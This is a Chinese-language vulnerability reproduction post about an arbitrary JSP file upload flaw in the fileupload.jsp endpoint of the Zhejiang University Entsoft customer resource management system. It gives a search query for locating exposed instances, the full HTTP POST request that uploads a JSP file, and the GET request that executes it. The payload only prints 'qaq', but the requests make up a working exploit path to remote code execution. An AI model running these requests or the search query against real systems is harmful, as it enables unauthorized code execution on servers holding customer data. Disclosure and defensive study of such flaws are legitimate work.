【漏洞复现】浙大恩特客户资源管理系统文件上传漏洞

漏洞描述

浙大恩特客户资源管理系统中的fileupload.jsp接口存在安全漏洞,允许攻击者向系统上传任意恶意JSP文件,从而可能导致潜在的远程执行代码攻击。该漏洞可能会对系统的完整性和安全性产生严重影响。

搜索语法

title="欢迎使用浙大恩特客户资源管理系统"

漏洞详情

上传命名为ovo.jsp的文件,内容为输出qaq

POST /entsoft_en/entereditor/jsp/fileupload.jsp?filename=ovo.jsp  HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 31


<% out.println("qaq"); %>

返回文件上传路径
【漏洞复现】浙大恩特客户资源管理系统文件上传漏洞_第1张图片

访问路径

GET /enterdoc/uploadfile/ovo.jsp  HTTP/1.1
Host: x.x.x.x
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

返回内容
【漏洞复现】浙大恩特客户资源管理系统文件上传漏洞_第2张图片

你可能感兴趣的:(漏洞复现,网络安全,学习,web安全,安全)